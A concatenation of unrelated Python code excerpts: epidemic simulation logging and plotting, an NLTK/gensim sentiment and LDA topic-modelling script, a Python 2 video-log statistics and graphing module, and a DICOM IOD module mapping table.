self.nodeGroupData[groupName]['numTested'][:self.time_detected + 1]),
f"{groupName}_meanTests1st": numpy.sum(
self.nodeGroupData[groupName]['numTested'][:self.time_detected + 1]) / self.tseries[
self.time_detected] if self.time_detected else 0,
f"{groupName}_finS": self.nodeGroupData[groupName]['numS'][self.tidx] * finscale,
f"{groupName}_finE": self.nodeGroupData[groupName]['numE'][self.tidx] * finscale,
f"{groupName}_finI": self.nodeGroupData[groupName]['numI'][self.tidx] * finscale,
f"{groupName}_finD_E": self.nodeGroupData[groupName]['numD_E'][self.tidx] * finscale,
f"{groupName}_finD_I": self.nodeGroupData[groupName]['numD_I'][self.tidx] * finscale,
f"{groupName}_finR": self.nodeGroupData[groupName]['numR'][self.tidx] * finscale,
f"{groupName}_finF": self.nodeGroupData[groupName]['numF'][self.tidx] * finscale,
})
log.update({
f"{groupName}_undetected1st": self.nodeGroupData[groupName]['numE'][self.time_detected] +
self.nodeGroupData[groupName]['numI'][self.time_detected],
f"{groupName}_infected1st": self.nodeGroupData[groupName]['numE'][self.time_detected] +
self.nodeGroupData[groupName]['numI'][self.time_detected] +
self.nodeGroupData[groupName]['numD_E'][self.time_detected] +
self.nodeGroupData[groupName]['numD_I'][self.time_detected],
f"{groupName}_totUndetected1st": log[f"{groupName}_totE_tillFirst"] + log[
f"{groupName}_totI_tillFirst"],
f"{groupName}_meanUndetected1st": (log[f"{groupName}_totE_tillFirst"] + log[
f"{groupName}_totI_tillFirst"]) / self.tseries[self.time_detected] if self.time_detected else 0
})
time1st = self.tseries[self.time_detected]
log.update({
"totInfected": log["totE"] + log["totI"] + log["totD_E"] + log["totD_I"],
"maxInfected": numpy.max(self.numE + self.numI + self.numD_E + self.numD_I),
"finInfected": log["finE"] + log["finI"] + log["finD_E"] + log["finD_I"],
"totUndetected": log["totE"] + log["totI"],
"meanUndetectedInfectiousDays": log["totI"] / self.t,
"meanUndetected": (log["totE"] + log["totI"]) / self.t,
"undetected1st": self.numE[self.time_detected] + self.numI[self.time_detected],
"infected1st": self.numE[self.time_detected] + self.numI[self.time_detected] + self.numD_E[
self.time_detected] + self.numD_I[self.time_detected],
"totUndetected1st": log["totE_tillFirst"] + log["totI_tillFirst"],
"meanUndetected1st": (log["totE_tillFirst"] + log["totI_tillFirst"]) / self.tseries[
self.time_detected] if self.time_detected else 0,
"meanTests": log["totTests"] / self.t,
"finUndetected": log["finE"] + log["finI"],
"overall_infected": self.numNodes - log["finS"]})
# compute baseline risk if the workplace was closed.
mean_p_extern = numpy.mean(self.p_extern) if isinstance(self.p_extern, (list, numpy.ndarray)) else self.p_extern
gamma = numpy.mean(self.gamma) if isinstance(self.gamma, (list, numpy.ndarray)) else self.gamma
base_risk = mean_p_extern / gamma
log["excessRisk"] = 100 * (log["totI"] / (self.t * self.numNodes) - base_risk) / base_risk if base_risk else 0
return log
# ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
# ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
def plot(self, ax=None, plot_S='line', plot_E='line', plot_I='line', plot_R='line', plot_F='line',
plot_D_E='line', plot_D_I='line', combine_D=True,
color_S='tab:green', color_E='orange', color_I='crimson', color_R='tab:blue', color_F='black',
color_D_E='mediumorchid', color_D_I='mediumorchid', color_reference='#E0E0E0',
dashed_reference_results=None, dashed_reference_label='reference',
shaded_reference_results=None, shaded_reference_label='reference',
vlines=[], vline_colors=[], vline_styles=[], vline_labels=[],
ylim=None, xlim=None, legend=True, title=None, side_title=None, plot_percentages=True, plot_tested=True):
import matplotlib.pyplot as pyplot
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
# Create an Axes object if None provided:
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
if (not ax):
fig, ax = pyplot.subplots()
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
# Prepare data series to be plotted:
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Fseries = self.numF / self.numNodes if plot_percentages else self.numF
Eseries = self.numE / self.numNodes if plot_percentages else self.numE
Dseries = (self.numD_E + self.numD_I) / self.numNodes if plot_percentages else (self.numD_E + self.numD_I)
D_Eseries = self.numD_E / self.numNodes if plot_percentages else self.numD_E
D_Iseries = self.numD_I / self.numNodes if plot_percentages else self.numD_I
Iseries = self.numI / self.numNodes if plot_percentages else self.numI
Rseries = self.numR / self.numNodes if plot_percentages else self.numR
Sseries = self.numS / self.numNodes if plot_percentages else self.numS
Testseries = self.numTested / self.numNodes if plot_percentages else self.numTested
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~`
# Draw tested fraction
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
if (plot_tested):
# average over 3 days
# temp = [0] * (int(self.t/3) +2)
# for id in range(self.tidx):
# temp[int(self.tseries[id]/3)] += Testseries[id]
# for id in range(self.tidx):
# Testseries[id] = temp[int(self.tseries[id]/3)]/3
# ax.plot(self.tseries, Testseries,color='grey', linestyle='--', label ='tested', zorder=1)
ax.fill_between(numpy.ma.masked_where(Testseries <= 0, self.tseries),
numpy.ma.masked_where(Testseries <= 0, Testseries), color='grey', label='tested', alpha=0.4,
zorder=4)
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
# Draw the reference data:
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
if (dashed_reference_results):
dashedReference_tseries = dashed_reference_results.tseries[::int(self.numNodes / 100)]
dashedReference_IDEstack = (
dashed_reference_results.numI + dashed_reference_results.numD_I + dashed_reference_results.numD_E + dashed_reference_results.numE)[
::int(self.numNodes / 100)] / (self.numNodes if plot_percentages else 1)
ax.plot(dashedReference_tseries, dashedReference_IDEstack, color='#E0E0E0', linestyle='--',
label='$I+D+E$ (' + dashed_reference_label + ')', zorder=0)
if (shaded_reference_results):
shadedReference_tseries = shaded_reference_results.tseries
shadedReference_IDEstack = (
shaded_reference_results.numI + shaded_reference_results.numD_I + shaded_reference_results.numD_E + shaded_reference_results.numE) / (
self.numNodes if plot_percentages else 1)
ax.fill_between(shaded_reference_results.tseries, shadedReference_IDEstack, 0, color='#EFEFEF',
label='$I+D+E$ (' + shaded_reference_label + ')', zorder=0)
ax.plot(shaded_reference_results.tseries, shadedReference_IDEstack, color='#E0E0E0', zorder=1)
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
# Draw the stacked variables:
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
topstack = numpy.zeros_like(self.tseries)
if (any(Fseries) and plot_F == 'stacked'):
ax.fill_between(numpy.ma.masked_where(Fseries <= 0, self.tseries),
numpy.ma.masked_where(Fseries <= 0, topstack + Fseries), topstack, color=color_F, alpha=0.5,
label='$F$', zorder=2)
ax.plot(numpy.ma.masked_where(Fseries <= 0, self.tseries),
numpy.ma.masked_where(Fseries <= 0, topstack + Fseries), color=color_F, zorder=3)
topstack = topstack + Fseries
if (any(Eseries) and plot_E == 'stacked'):
ax.fill_between(numpy.ma.masked_where(Eseries <= 0, self.tseries),
numpy.ma.masked_where(Eseries <= 0, topstack + Eseries), topstack, color=color_E, alpha=0.5,
label='$E$', zorder=2)
ax.plot(numpy.ma.masked_where(Eseries <= 0, self.tseries),
numpy.ma.masked_where(Eseries <= 0, topstack + Eseries), color=color_E, zorder=3)
topstack = topstack + Eseries
if (combine_D and plot_D_E == 'stacked' and plot_D_I == 'stacked'):
ax.fill_between(numpy.ma.masked_where(Dseries <= 0, self.tseries),
numpy.ma.masked_where(Dseries <= 0, topstack + Dseries), topstack, color=color_D_E,
alpha=0.5, label='$D_{all}$', zorder=2)
ax.plot(numpy.ma.masked_where(Dseries <= 0, self.tseries),
numpy.ma.masked_where(Dseries <= 0, topstack + Dseries), color=color_D_E, zorder=3)
topstack = topstack + Dseries
else:
if (any(D_Eseries) and plot_D_E == 'stacked'):
ax.fill_between(numpy.ma.masked_where(D_Eseries <= 0, self.tseries),
numpy.ma.masked_where(D_Eseries <= 0, topstack + D_Eseries), topstack, color=color_D_E,
alpha=0.5, label='$D_E$', zorder=2)
ax.plot(numpy.ma.masked_where(D_Eseries <= 0, self.tseries),
numpy.ma.masked_where(D_Eseries <= 0, topstack + D_Eseries), color=color_D_E, zorder=3)
topstack = topstack + D_Eseries
if (any(D_Iseries) and plot_D_I == 'stacked'):
ax.fill_between(numpy.ma.masked_where(D_Iseries <= 0, self.tseries),
numpy.ma.masked_where(D_Iseries <= 0, topstack + D_Iseries), topstack, color=color_D_I,
alpha=0.5, label='$D_I$', zorder=2)
ax.plot(numpy.ma.masked_where(D_Iseries <= 0, self.tseries),
numpy.ma.masked_where(D_Iseries <= 0, topstack + D_Iseries), color=color_D_I, zorder=3)
topstack = topstack + D_Iseries
if (any(Iseries) and plot_I == 'stacked'):
ax.fill_between(numpy.ma.masked_where(Iseries <= 0, self.tseries),
numpy.ma.masked_where(Iseries <= 0, topstack + Iseries), topstack, color=color_I, alpha=0.5,
label='$I$', zorder=2)
ax.plot(numpy.ma.masked_where(Iseries <= 0, self.tseries),
numpy.ma.masked_where(Iseries <= 0, topstack + Iseries), color=color_I, zorder=3)
topstack = topstack + Iseries
if (any(Rseries) and plot_R == 'stacked'):
ax.fill_between(numpy.ma.masked_where(Rseries <= 0, self.tseries),
numpy.ma.masked_where(Rseries <= 0, topstack + Rseries), topstack, color=color_R, alpha=0.5,
label='$R$', zorder=2)
ax.plot(numpy.ma.masked_where(Rseries <= 0, self.tseries),
numpy.ma.masked_where(Rseries <= 0, topstack + Rseries), color=color_R, zorder=3)
topstack = topstack + Rseries
if (any(Sseries) and plot_S == 'stacked'):
ax.fill_between(numpy.ma.masked_where(Sseries <= 0, self.tseries),
numpy.ma.masked_where(Sseries <= | |
<gh_stars>0
# -*- coding: utf-8 -*-
"""
Created on Mon Nov 11 13:41:14 2019
@author: Emmett & Binyang
"""
from pprint import pprint
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
import seaborn as sns
from nltk.tokenize.punkt import PunktSentenceTokenizer, PunktTrainer
##Let’s first build a corpus to train our tokenizer on. We’ll use stuff available in NLTK:
from nltk.corpus import gutenberg
# print (dir(gutenberg))
# print (gutenberg.fileids())
text = ""
for file_id in gutenberg.fileids():
text += gutenberg.raw(file_id)
print (len(text))
##a funtion that converts a list to a string
def listToString(s):
# initialize an empty string
str1 = ""
# traverse in the string
for ele in s:
str1 += ele
# return string
return str1
##extract sentences from samples for following sentiment analysis
sampNum = 1
sent_df = pd.DataFrame()
i = 0
while (sampNum < 186):
fileOpen = open("sample"+str(sampNum)+".txt","r")
temp = fileOpen.readlines()
temp = listToString(temp)
trainer = PunktTrainer()
trainer.INCLUDE_ALL_COLLOCS = True
trainer.train(text)
tokenizer = PunktSentenceTokenizer(trainer.get_params())
##Adding more abbreviations
tokenizer._params.abbrev_types.add('dr')
sent = tokenizer.tokenize(temp)
for sent in sent:
sent_df.loc[i, 'sent'] = sent
sent_df.loc[i, 'sample'] = sampNum
i += 1
sampNum += 1
##NLTK’s built-in Vader Sentiment Analyzer will simply rank a piece of text as positive, negative or neutral
##using a lexicon of positive and negative words.
##We can utilize this tool by first creating a Sentiment Intensity Analyzer (SIA) to categorize our headlines,
##then we'll use the polarity_scores method to get the sentiment.
##We'll append each sentiment dictionary to a results list, which we'll transform into a dataframe:
from nltk.sentiment.vader import SentimentIntensityAnalyzer as SIA
sia = SIA()
results = []
for idx, row in sent_df.iterrows():
line = row['sent']
score = sia.polarity_scores(line)
sent_df.loc[idx, 'neg'] = score.get('neg')
sent_df.loc[idx, 'neu'] = score.get('neu')
sent_df.loc[idx, 'pos'] = score.get('pos')
sent_df.loc[idx, 'compound'] = score.get('compound')
# pprint(results[:10], width=100)
##We will consider posts with a compound value greater than 0.2 as positive and less than -0.2 as negative.
##There's some testing and experimentation that goes with choosing these ranges, and there is a trade-off to be
##made here. If you choose a higher value, you might get more compact results (less false positives and false
##negatives), but the size of the results will decrease significantly.
sent_df['label'] = 0
sent_df.loc[sent_df['compound'] > 0.3, 'label'] = 1
sent_df.loc[sent_df['compound'] < -0.3, 'label'] = -1
# sent_df.head()
##We have all the data we need to save, so let's do that:
sent_df.to_csv('sentiment analysis.csv', mode='a', encoding='utf-8', index=False)
##We can now keep appending to this csv, but just make sure that if you reassign the headlines set, you could get
##duplicates. Maybe add a more advanced saving function that reads and removes duplicates before saving.
#Let's first take a peak at a few positive and negative headlines:
print("Positive headlines:\n")
pprint(list(sent_df[sent_df['label'] == 1].sent)[:5], width=200)
print("\nNegative headlines:\n")
pprint(list(sent_df[sent_df['label'] == -1].sent)[:5], width=200)
##Now let's check how many total positives and negatives we have in this dataset:
print(sent_df.label.value_counts())
print(sent_df.label.value_counts(normalize=True) * 100)
##The first line gives us raw value counts of the labels, whereas the second line provides percentages
##with the normalize keyword.
##For fun, let's plot a bar chart:
"""
fig, ax = plt.subplots(figsize=(8, 8))
counts = sent_df.label.value_counts(normalize=True) * 100
sns.barplot(x=counts.index, y=counts, ax=ax)
ax.set_xticklabels(['Negative', 'Neutral', 'Positive'])
ax.set_ylabel("Percentage")
plt.show()
"""
##filter the sentences by number of words in it
for idx, row in sent_df.iterrows():
sentence = row['sent']
sent_df.loc[idx, 'len_sent'] = len(sentence.split())
##split positive and other sentences
pos = sent_df[sent_df['label'] == 1]
neg = sent_df[sent_df['label'] != 1]
import gensim
from gensim.parsing.preprocessing import strip_non_alphanum
from gensim.parsing.preprocessing import strip_punctuation
from gensim.parsing.preprocessing import strip_multiple_whitespaces
from gensim.parsing.preprocessing import stem_text
corpus_full = []
for idx, row in sent_df.iterrows():
temp = row['sent']
temp1 = strip_non_alphanum(str(temp))
temp2 = strip_punctuation(temp1)
temp3 = strip_multiple_whitespaces(temp2)
final = stem_text(temp3)
corpus_full.append(final)
corpus_pos = []
for idx, row in pos.iterrows():
temp = row['sent']
temp1 = strip_non_alphanum(str(temp))
temp2 = strip_punctuation(temp1)
temp3 = strip_multiple_whitespaces(temp2)
final = stem_text(temp3)
corpus_pos.append(final)
corpus_neg = []
for idx, row in neg.iterrows():
temp = row['sent']
temp1 = strip_non_alphanum(str(temp))
temp2 = strip_punctuation(temp1)
temp3 = strip_multiple_whitespaces(temp2)
final = stem_text(temp3)
corpus_neg.append(final)
from nltk.corpus import stopwords
stop_words = stopwords.words('english')
stoplist = set('a about above after again against all am an and any are arent\
as also at be because been before being below between both but\
by cant cannot could couldnt did didnt do does doesnt doing dont\
down during each els few for from further had hadnt has have havent\
having he hed hes her here heres hers herself him himself his\
how hows i id ill im ive if in into is isnt it its itself lets\
me more most mustnt my myself no nor not of off on once only or\
other ought our ours ourselves out over own same shant she shes\
should shouldnt so some such than that thats the their theirs\
them themselves then there theres these they theyd theyll theyre\
theyve this those through to too under until up very was wasnt\
we wed were weve were werent what whats when whens which while\
who whos whom why whys with wont would wouldnt you youd youll\
youre youve your yours yourself yourselves ll ve s ar mayb ha re\
us thi isn a b c d e f g h i j k l m n o p q r s t u v w x y z\
hi will can get back go don wa let atc ok ani mi thei whenev make\
just take aw know sai good baltimor jetblu lol thank thanks like\
vari might less highest billion nice probabl lot fuck shit sure\
feel dure befor realli work veri chanc see awai onc onli dy aren\
100 someth thing even happen becaus wai everi much help want think\
fear flight plane fly mai time dai\
1 2 3 4 5 6 7 8 9 10'.split())
print (len(stoplist))
stoplist.update(stop_words)
print(len(stop_words))
print(len(stoplist))
#standardize text -- makes all characters lowercase and removes common stop words
text_full = [[word for word in document.lower().split() if word not in stoplist]
for document in corpus_full]
print(text_full)
text_pos = [[word for word in document.lower().split() if word not in stoplist]
for document in corpus_pos]
text_neg = [[word for word in document.lower().split() if word not in stoplist]
for document in corpus_neg]
#count number of times that word appears in corpus
#pair frequency with respective word in new array
from collections import defaultdict
frequency = defaultdict(int)
for text in text_full:
for token in text:
frequency[token] += 1
corpus_removeOne_full = [[token for token in text if frequency[token]>1] for text in text_full]
frequency = defaultdict(int)
for text in text_pos:
for token in text:
frequency[token] += 1
corpus_removeOne_pos = [[token for token in text if frequency[token]>1] for text in text_pos]
frequency = defaultdict(int)
for text in text_neg:
for token in text:
frequency[token] += 1
corpus_removeOne_neg = [[token for token in text if frequency[token]>1] for text in text_neg]
from gensim import corpora
#add corpora to dictionary
dictionary_full = corpora.Dictionary(corpus_removeOne_full)
dictionary_pos = corpora.Dictionary(corpus_removeOne_pos)
dictionary_neg = corpora.Dictionary(corpus_removeOne_neg)
#save dictionary for future reference
dictionary_full.save('redditTest_full.dict')
dictionary_pos.save('redditTest_pos.dict') #location of document in computer
dictionary_neg.save('redditTest_neg.dict')
#dict = gensim.corpora.Dictionary.load('redditTest.dict')
#assign numeric id to each token in dictionary
dictID_full = dictionary_full.token2id
dictID_pos = dictionary_pos.token2id
dictID_neg = dictionary_neg.token2id
#remove empty sentences
for text in corpus_removeOne_full:
if len(text) == 0:
corpus_removeOne_full.remove(text)
for text in corpus_removeOne_pos:
if len(text) == 0:
corpus_removeOne_pos.remove(text)
for text in corpus_removeOne_neg:
if len(text) == 0:
corpus_removeOne_neg.remove(text)
#converts each word into vector following same process as example
#Bag of Word Corpus of Full Sentiment
bow_corpus_full = [dictionary_full.doc2bow(text) for text in corpus_removeOne_full]
corpora.MmCorpus.serialize('redditTest_full.mm', bow_corpus_full)
corp_full = gensim.corpora.MmCorpus('redditTest_full.mm')
from gensim import models
tfidf_pos = models.TfidfModel(bow_corpus_full)
corpus_tfidf_full = tfidf_pos[bow_corpus_full]
#Bag of Word Corpus of Positive Sentiment
bow_corpus_pos = [dictionary_pos.doc2bow(text) for text in corpus_removeOne_pos]
corpora.MmCorpus.serialize('redditTest_pos.mm', bow_corpus_pos)
corp_pos = gensim.corpora.MmCorpus('redditTest_pos.mm')
from gensim import models
tfidf_pos = models.TfidfModel(bow_corpus_pos)
corpus_tfidf_pos = tfidf_pos[bow_corpus_pos]
#Bag of Word Corpus of Negative Sentiment
bow_corpus_neg = [dictionary_neg.doc2bow(text) for text in corpus_removeOne_neg]
corpora.MmCorpus.serialize('redditTest_neg.mm', bow_corpus_neg)
corp_neg = gensim.corpora.MmCorpus('redditTest_neg.mm')
from gensim import models
tfidf_neg = models.TfidfModel(bow_corpus_neg)
corpus_tfidf_neg = tfidf_neg[bow_corpus_neg]
#LDA Mallet for full corpus
mallet_path = '/Users/emmet/.spyder-py3-dev/REU_Project/mallet-2.0.8/bin/mallet'
lda_full = gensim.models.wrappers.LdaMallet(mallet_path, corpus=bow_corpus_full, num_topics=9, id2word=dictionary_full, workers=1, alpha=110, random_seed=109, iterations=50)
corpus_LDA_full = lda_full[bow_corpus_full]
lda_full.print_topics(9)
#LDA Mallet for positive corpus
mallet_path = '/Users/emmet/.spyder-py3-dev/REU_Project/mallet-2.0.8/bin/mallet'
lda_pos = gensim.models.wrappers.LdaMallet(mallet_path, corpus=bow_corpus_pos, num_topics=9, id2word=dictionary_pos, workers=1, alpha=110, random_seed=109, iterations=50)
corpus_LDA_pos = lda_pos[bow_corpus_pos]
lda_pos.print_topics(9)
#LDA Mallet for negative corpus
mallet_path = '/Users/emmet/.spyder-py3-dev/REU_Project/mallet-2.0.8/bin/mallet'
lda_neg = gensim.models.wrappers.LdaMallet(mallet_path, corpus=bow_corpus_neg, num_topics=9, id2word=dictionary_neg, workers=1, alpha=110, random_seed=109, iterations=50)
corpus_LDA_neg = lda_neg[bow_corpus_neg]
lda_neg.print_topics(9)
import pandas as pd
import matplotlib.pyplot as plt
import matplotlib.colors as mcolors
from sklearn.manifold import TSNE
colors = np.array([color for name, color in mcolors.TABLEAU_COLORS.items()])
#t-SNE plot for full corpus
n_topics = 9
topic_weights_full = []
for row_list in lda_full[bow_corpus_full]:
tmp = np.zeros(n_topics)
for i, w in row_list:
tmp[i] = w
topic_weights_full.append(tmp)
arr_full = pd.DataFrame(topic_weights_full).fillna(9).values
topic_num_full = np.argmax(arr_full, axis=1)
tsne_model_full = TSNE(n_components=3, random_state=None, method='barnes_hut',
angle=0.5, init='pca')
tsne_lda_full = tsne_model_full.fit_transform(arr_full)
sub = str.maketrans("0123456789", "₀₁₂₃₄₅₆₇₈₉")
plt.xlabel('t-SNE1'.translate(sub))
plt.ylabel('t-SNE2'.translate(sub))
plt.title('t-SNE Plot of Topics | |
the
referer hostname (domains).
"""
keys = self.referer_host_hits.keys()
keys.sort(lambda x, y: cmp(self.referer_host_hits[y],
self.referer_host_hits[x]))
keys = keys[:GRAPH_ITEMS_MAX]
return keys
class Summary(dict):
"""
A dictionary of SummaryItems that represents a total summary of all
files contained in the log. This object provides special methods for
retrieving keys sorted on particular criteria, such as the most hits
or longest average elapsed time.
"""
def __init__(self):
"""
Initialize dictionary, set sane defaults, clear all caches.
"""
dict.__init__(self)
self.pos = 0
self.common_prefix_len = 0
self.ip_hits = {}
self.agent_hits = {}
self.referer_hits = {}
self.referer_host_hits = {}
self.reset_caches()
self.version = VERSION
self.clients = {}
self.versions = {}
def reset_caches(self):
"""
Clear all caches so that they are recalculated when sorted keys
are requested. This should be called whenever the summary is
updated with new information so that new caches are generated
that take this new information into account.
"""
self._keys_hits = None
self._keys_elapsed_avg = None
self._keys_percent_watched = None
self._keys_ip_hits = None
self._keys_agent_hits = None
self._keys_referer_hits = None
self._keys_referer_host_hits = None
self._keys_clients = None
def calculate_common_prefix(self):
"""
Recalculate the common prefix length that all files share. This
should be called whenever the summary object is updated from the
log file. The common prefix length is used when returning file
titles and names for simplifying their display in graphs and
tables.
"""
prefix = None
if len(self) > 1:
for key in self:
if prefix == None:
prefix = key
else:
for x in range(len(key), -1, -1):
if prefix.startswith(key[:x]):
prefix = key[:x]
break
if prefix == "":
break
elif len(self) == 1:
prefix = os.path.dirname(self.keys()[0]) + "/"
if prefix:
self.common_prefix_len = len(prefix)
else:
self.common_prefix_len = 0
def keys_hits(self):
"""
Return a list of keys sorted by the total number of hits per file,
sorted from most hits to fewest.
"""
if self._keys_hits:
return self._keys_hits
keys = self.keys()
keys.sort(lambda x, y: cmp(self[y].hits, self[x].hits))
#keys = keys[:GRAPH_ITEMS_MAX]
self._keys_hits = keys
return keys
def keys_hits_titles(self):
"""
Return a list of keys sorted by the total number of hits per file,
with each element either the title of the video (if available) or
the file name of the video minus any common prefix that all file
names have in common.
"""
return [self[key].title != "undefined" and self[key].title or key[self.common_prefix_len:] for key in self.keys_hits()]
def keys_elapsed_avg(self):
"""
Return a list of keys sorted by the average elapsed time per file,
sorted from longest to shortest.
"""
if self._keys_elapsed_avg:
return self._keys_elapsed_avg
keys = self.keys()
keys.sort(lambda x, y: cmp(self[y].elapsed_avg, self[x].elapsed_avg))
keys = keys[:GRAPH_ITEMS_MAX]
self._keys_elapsed_avg = keys
return keys
def keys_elapsed_avg_titles(self):
"""
Return a list of keys sorted by the average_elapsed time per file,
with each element either the title of the video (if available) or
the file name of the video minus any common prefix that all file
names have in common.
"""
return [self[key].title != "undefined" and self[key].title or key[self.common_prefix_len:] for key in self.keys_elapsed_avg()]
def keys_percent_watched(self):
"""
Return a list of keys sorted by the percent of the file that was
watched, sorted from highest to lowest.
"""
if self._keys_percent_watched:
return self._keys_percent_watched
keys = self.keys()
keys.sort(lambda x, y: cmp(self[y].percent_watched, self[x].percent_watched))
keys = keys[:GRAPH_ITEMS_MAX]
self._keys_percent_watched = keys
return keys
def keys_percent_watched_titles(self):
"""
Return a list of keys sorted by the percent of the file that was
watched, with each element either the title of the video (if
available) or the file name of the video minus any common prefix
that all file names have in common.
"""
return [self[key].title != "undefined" and self[key].title or key[self.common_prefix_len:] for key in self.keys_percent_watched()]
def keys_ip_hits(self):
"""
Return a list of IPs, sorted by the number of hits per IP, from
highest to lowest.
"""
if self._keys_ip_hits:
return self._keys_ip_hits
keys = self.ip_hits.keys()
keys.sort(lambda x, y: cmp(self.ip_hits[y], self.ip_hits[x]))
keys = keys[:GRAPH_ITEMS_MAX]
self._keys_ip_hits = keys
return keys
def keys_referer_hits(self):
"""
Return a list of referers, sorted by the number of hits per referer,
from highest to lowest.
"""
if self._keys_referer_hits:
return self._keys_referer_hits
keys = self.referer_hits.keys()
keys.sort(lambda x, y: cmp(self.referer_hits[y], self.referer_hits[x]))
keys = keys[:GRAPH_ITEMS_MAX]
self._keys_referer_hits = keys
return keys
def keys_referer_host_hits(self):
"""
Return a list of referer hosts, sorted by the number of hits per
referer, from highest to lowest.
"""
if self._keys_referer_host_hits:
return self._keys_referer_host_hits
keys = self.referer_host_hits.keys()
keys.sort(lambda x, y: cmp(self.referer_host_hits[y],
self.referer_host_hits[x]))
keys = keys[:GRAPH_ITEMS_MAX]
self._keys_referer_host_hits = keys
return keys
def keys_agent_hits(self):
"""
Return a list of user agents, sorted by the number of hits per
user agent, from highest to lowest.
"""
if self._keys_agent_hits:
return self._keys_agent_hits
keys = self.agent_hits.keys()
keys.sort(lambda x, y: cmp(self.agent_hits[y], self.agent_hits[x]))
keys = keys[:GRAPH_ITEMS_MAX]
self._keys_agent_hits = keys
return keys
def keys_hits_by_ip(self, ip):
"""
Return a tuple of (hits, keys) where hits is a dict corresponding
to the number of hits per file from a particular ip and keys are
the keys (file names) sorted by hits in increasing order.
"""
file_hits = {}
for filename in self:
for address in self[filename].ips:
if address == ip:
if filename not in file_hits:
file_hits[filename] = 0
file_hits[filename] += 1
top_files_keys = file_hits.keys()
top_files_keys.sort(lambda x, y: cmp(file_hits[y], file_hits[x]))
return (file_hits, top_files_keys)
def keys_hits_by_ip_titles(self, ip):
"""
Return a list of keys sorted by the number of hits per file, with
each element either the title of the video (if available) or the
file name of the video minus any common prefix that all file names
have in common.
"""
hits, keys = self.keys_hits_by_ip(ip)
return [self[key].title != "undefined" and self[key].title or key[self.common_prefix_len:] for key in keys]
def keys_clients(self):
"""
Return a list of clients sorted by the number of hits.
"""
if self._keys_clients:
return self._keys_clients
keys = self.clients.keys()
keys.sort(lambda x, y: cmp(self.clients[y], self.clients[x]))
self._keys_clients = keys
return keys
class Graph(graph):
"""
The default base graph for Simple Stats graphs that defines some
color and style information and simplifies several methods.
"""
def __init__(self, title):
graph.__init__(self)
self.bg_colour = GRAPH_BACKGROUND_COLOR
self.y_max = 100
self.title(title)
self.set_x_axis_3d(12)
self.x_axis_colour = GRAPH_GRID_COLOR
self.x_grid_colour = GRAPH_GRID_COLOR
self.y_axis_colour = GRAPH_GRID_COLOR
self.y_grid_colour = GRAPH_GRID_COLOR
self.set_x_label_style(8, GRAPH_LABEL_COLOR, 2)
self.set_y_label_style(8, GRAPH_LABEL_COLOR)
self.set_x_legend("Videos")
self.set_y_legend("Hits")
def title(self, text):
graph.title(self, text, "{font-size:20px; color:%s;}" % GRAPH_TITLE_COLOR)
def bar_3d(self, color, name):
graph.bar_3d(self, GRAPH_BAR_OPACITY, color, name, 10)
def set_y_legend(self, name):
graph.set_y_legend(self, name, 12, GRAPH_LABEL_COLOR)
def set_x_legend(self, name):
graph.set_x_legend(self, name, 12, GRAPH_LABEL_COLOR)
class GraphObject(graph_object):
"""
Override the default graph renderer.
"""
def __init__(self, options):
self.path = options.server_path
def render(self, width, height, data_url):
"""
Render this graph using the server path given to Simple Stats.
"""
return graph_object.render(self, width, height, data_url, self.path + os.path.sep)
def title_constrain(title):
"""
Constrain the length of a title to GRAPH_MAX_LABEL_LENGTH characters.
This method also URL-escapes the string for graph use.
"""
if len(title) > GRAPH_MAX_LABEL_LENGTH:
title = "..." + title[-(GRAPH_MAX_LABEL_LENGTH - 3):]
return quote(title)
def sec_to_str(sec):
"""
Return a nice string given a number of seconds, such as 21:53. Takes
into account hours, minutes, and seconds.
"""
s = ""
if sec < 0:
return "Unknown"
hours = sec / 3600
min = (sec % 3600) / 60
sec = sec % 60
if hours:
s += str(hours) + ":"
if min and min < 10 and hours:
s += "0" + str(min) + ":"
elif min:
s += str(min) + ":"
if sec < 10 and min:
s += "0"
s += str(sec)
return s
def percent_to_str(percent):
"""
Return a nice string given a percentage.
"""
s = ""
if percent < 0:
return "Unknown"
return str(int(percent)) + "%"
def sanitize_filename(filename):
"""
Return a sanitized file path with certain characters replaced.
"""
return filename.replace(":", "_").replace("/", "_")
def query(query_string, data):
"""
Return a query string for use in HTML links. For example, if
query_string is "?page=foo" and data is "date=200807" this function
will return "?page=foo&date=200807" while if query_string were "" | |
['Series'],
'HEMODYNAMIC IOD': ['Series'],
'OPHTHALMIC AXIAL MEASUREMENTS IOD': ['Series'],
'DIGITAL MAMMOGRAPHY X-RAY IMAGE IOD': ['Series'],
'VIDEO MICROSCOPIC IMAGE IOD': ['Series'],
'ENHANCED MR COLOR IMAGE IOD': ['Series'],
'ENHANCED CT IMAGE IOD': ['Series'],
'X-RAY RADIATION DOSE SR IOD': ['Series'],
'AUTOREFRACTION MEASUREMENTS IOD': ['Series'],
'PROCEDURE LOG IOD': ['Series'],
'IMPLANTATION PLAN SR DOCUMENT IOD': ['Series'],
'DIGITAL INTRA-ORAL X-RAY IMAGE IOD': ['Series'],
'STEREOMETRIC RELATIONSHIP IOD': ['Series'],
'INTRAOCULAR LENS CALCULATIONS IOD': ['Series'],
'X-RAY 3D CRANIOFACIAL IMAGE IOD': ['Series'],
'VL ENDOSCOPIC IMAGE IOD': ['Series'],
'KERATOMETRY MEASUREMENTS IOD': ['Series'],
'MULTI-FRAME SINGLE BIT SC IMAGE IOD': ['Series'],
'MULTI-FRAME GRAYSCALE BYTE SC IMAGE IOD': ['Series'],
'COMPREHENSIVE SR IOD': ['Series'],
'ENHANCED ULTRASOUND VOLUME IOD': ['Series'],
'KEY OBJECT SELECTION DOCUMENT IOD': ['Series'],
